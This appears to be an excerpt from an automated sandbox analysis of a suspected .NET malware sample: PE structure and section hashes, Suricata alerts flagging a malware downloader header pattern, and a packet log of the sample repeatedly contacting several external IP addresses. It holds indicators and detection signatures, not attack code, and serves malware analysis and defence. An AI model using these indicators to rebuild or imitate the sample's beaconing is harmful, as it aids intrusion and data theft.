add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc0b48	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc2000	0x2494	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbec00	0xbec00	b95fee5d01a10176963a0d2019778c63	False	0.9048190735583224	data	7.706025892082417	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc2000	0x2494	0x2600	4e3683f04d99df1c22412649b3c85bd6	False	0.8695518092105263	data	7.40354604986483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	b01ee0c30b57c1b6e4b394553ef35dd8	False	0.041015625	data	0.07763316234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc2100	0x1e7e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9827056110684089
RT_GROUP_ICON	0xc3f90	0x14	data	1.05
RT_VERSION	0xc3fb4	0x2e0	data	0.45108695652173914
RT_MANIFEST	0xc42a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T14:14:14.630603+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.8.169	80	TCP
2024-12-16T14:14:17.427453+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.8.169	80	TCP
2024-12-16T14:14:19.127433+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	172.67.177.134	443	TCP
2024-12-16T14:14:20.739935+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.8.169	80	TCP
2024-12-16T14:14:24.224485+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	132.226.8.169	80	TCP
2024-12-16T14:14:29.738608+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49747	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:14:12.534327030 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:12.654289961 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:12.654377937 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:12.654731989 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:12.778023005 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:14.085479975 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:14.090220928 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:14.210628986 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:14.581480026 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:14.630603075 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:15.196969986 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:15.197043896 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:15.197119951 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:15.203994036 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:15.204020023 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.422904968 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.422980070 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.429271936 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.429311991 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.429796934 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.474311113 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.502167940 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.547338009 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.867811918 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.867974043 CET	443	49736	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:16.868031025 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.876677036 CET	49736	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:16.880996943 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:17.003663063 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:17.371956110 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:17.427453041 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:17.458198071 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:17.458288908 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:17.458383083 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:17.460922003 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:17.460957050 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:18.682228088 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:18.684091091 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:18.684139013 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:19.127551079 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:19.127716064 CET	443	49737	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:19.127787113 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:19.128324032 CET	49737	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:19.132004976 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:19.132891893 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:19.252449036 CET	80	49734	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:19.252619028 CET	49734	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:19.252701044 CET	80	49738	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:19.252799988 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:19.252991915 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:19.372721910 CET	80	49738	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:20.684659958 CET	80	49738	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:20.686146975 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:20.686216116 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:20.686280012 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:20.686542988 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:20.686556101 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:20.739934921 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:21.901217937 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:21.904020071 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:21.904067039 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:22.354146957 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:22.354233980 CET	443	49739	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:22.354290009 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:22.354865074 CET	49739	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:22.359209061 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:22.360280037 CET	49740	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:22.479409933 CET	80	49738	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:22.479507923 CET	49738	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:22.480006933 CET	80	49740	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:22.480077028 CET	49740	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:22.480211020 CET	49740	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:22.599971056 CET	80	49740	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:24.170289993 CET	80	49740	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:24.172075987 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:24.172123909 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:24.172281981 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:24.172570944 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:24.172585011 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:24.224484921 CET	49740	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:25.384879112 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:25.388931036 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:25.388956070 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:25.830611944 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:25.830689907 CET	443	49742	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:25.830749035 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:25.831362009 CET	49742	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:25.836393118 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:25.956254959 CET	80	49744	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:25.956368923 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:25.956545115 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:26.076385975 CET	80	49744	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:28.073029041 CET	80	49744	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:28.077423096 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:28.077518940 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:28.077625036 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:28.077990055 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:28.078021049 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:28.130594015 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.292520046 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:29.311544895 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:29.311604977 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:29.738651037 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:29.738755941 CET	443	49747	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:29.738944054 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:29.739451885 CET	49747	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:29.744330883 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.745856047 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.864676952 CET	80	49744	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:29.864741087 CET	49744	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.865705013 CET	80	49749	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:29.865777016 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.866035938 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:29.985642910 CET	80	49749	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:31.830570936 CET	80	49749	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:31.832222939 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:31.832272053 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:31.832329988 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:31.832628012 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:31.832638979 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:31.880578995 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.047177076 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:33.049370050 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:33.049410105 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:33.497531891 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:33.497612000 CET	443	49751	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:33.497674942 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:33.498226881 CET	49751	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:33.502147913 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.502907038 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.622400045 CET	80	49749	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:33.622668028 CET	49749	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.622672081 CET	80	49752	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:33.622750044 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.623092890 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:33.742841959 CET	80	49752	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:35.948550940 CET	80	49752	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:35.950184107 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:35.950248003 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:35.950356007 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:35.950653076 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:35.950665951 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:35.990019083 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.165061951 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:37.174299955 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:37.174341917 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:37.616405010 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:37.616481066 CET	443	49753	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:37.616524935 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:37.616940975 CET	49753	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:37.620337963 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.621392965 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.743294001 CET	80	49752	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:37.743415117 CET	49752	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.743433952 CET	80	49754	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:37.743510008 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.743743896 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:37.865283012 CET	80	49754	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:39.210098028 CET	80	49754	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:39.211745977 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:39.211831093 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:39.211905003 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:39.212198973 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:39.212213039 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:39.255673885 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:40.435746908 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:40.437427044 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:40.437468052 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:40.883368969 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:40.883487940 CET	443	49755	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:40.883579016 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:40.890105963 CET	49755	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:40.893431902 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:40.894073009 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:41.013768911 CET	80	49754	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:41.013839006 CET	49754	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:41.013842106 CET	80	49756	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:41.013917923 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:41.014059067 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:41.134212971 CET	80	49756	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:42.601787090 CET	80	49756	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:42.603224039 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:42.603266001 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:42.603357077 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:42.603619099 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:42.603636980 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:42.646296024 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:43.821007967 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:43.822802067 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:43.822833061 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:44.315924883 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:44.316011906 CET	443	49757	172.67.177.134	192.168.2.4
Dec 16, 2024 14:14:44.316083908 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:44.319107056 CET	49757	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:14:44.409270048 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:44.531363010 CET	80	49756	132.226.8.169	192.168.2.4
Dec 16, 2024 14:14:44.531532049 CET	49756	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:44.554157019 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:44.554210901 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:44.554318905 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:44.558301926 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:44.558317900 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:45.925477028 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:45.925540924 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:45.930321932 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:45.930330992 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:45.930659056 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:45.932209969 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:45.975338936 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:46.436727047 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:46.436822891 CET	443	49758	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:46.436944008 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:46.443778038 CET	49758	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:52.862051964 CET	49740	80	192.168.2.4	132.226.8.169
Dec 16, 2024 14:14:52.935800076 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:52.935856104 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:52.935942888 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:52.936250925 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:52.936265945 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.299628973 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.301846027 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:54.301868916 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.301984072 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:54.301991940 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.887543917 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.887630939 CET	443	49759	149.154.167.220	192.168.2.4
Dec 16, 2024 14:14:54.887689114 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:14:54.888364077 CET	49759	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:16.233973980 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:16.234077930 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:16.234199047 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:16.243746996 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:16.243798018 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:17.609493017 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:17.611515999 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:17.611603975 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:17.611720085 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:17.611735106 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:18.279676914 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:18.279764891 CET	443	49792	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:18.279885054 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:18.280683994 CET	49792	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:18.284614086 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:18.284666061 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:18.284778118 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:18.285077095 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:18.285094976 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:19.648536921 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:19.650633097 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:19.650662899 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:19.650733948 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:19.650743008 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:20.192603111 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:20.193103075 CET	443	49797	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:20.193212032 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:20.194053888 CET	49797	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:20.197911024 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:20.198008060 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:20.198128939 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:20.198442936 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:20.198482990 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:21.569031000 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:21.571454048 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:21.571521997 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:21.571587086 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:21.571609020 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:22.113352060 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:22.113451004 CET	443	49803	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:22.113527060 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:22.114341021 CET	49803	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:22.130187988 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:22.130264997 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:22.130335093 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:22.131398916 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:22.131434917 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:23.507846117 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:23.512674093 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:23.512701988 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:23.512763977 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:23.512772083 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:24.080872059 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:24.080970049 CET	443	49809	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:24.081152916 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:24.081589937 CET	49809	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:24.084557056 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:24.084598064 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:24.084683895 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:24.084943056 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:24.084955931 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:25.459603071 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:25.463048935 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:25.463087082 CET	443	49815	149.154.167.220	192.168.2.4
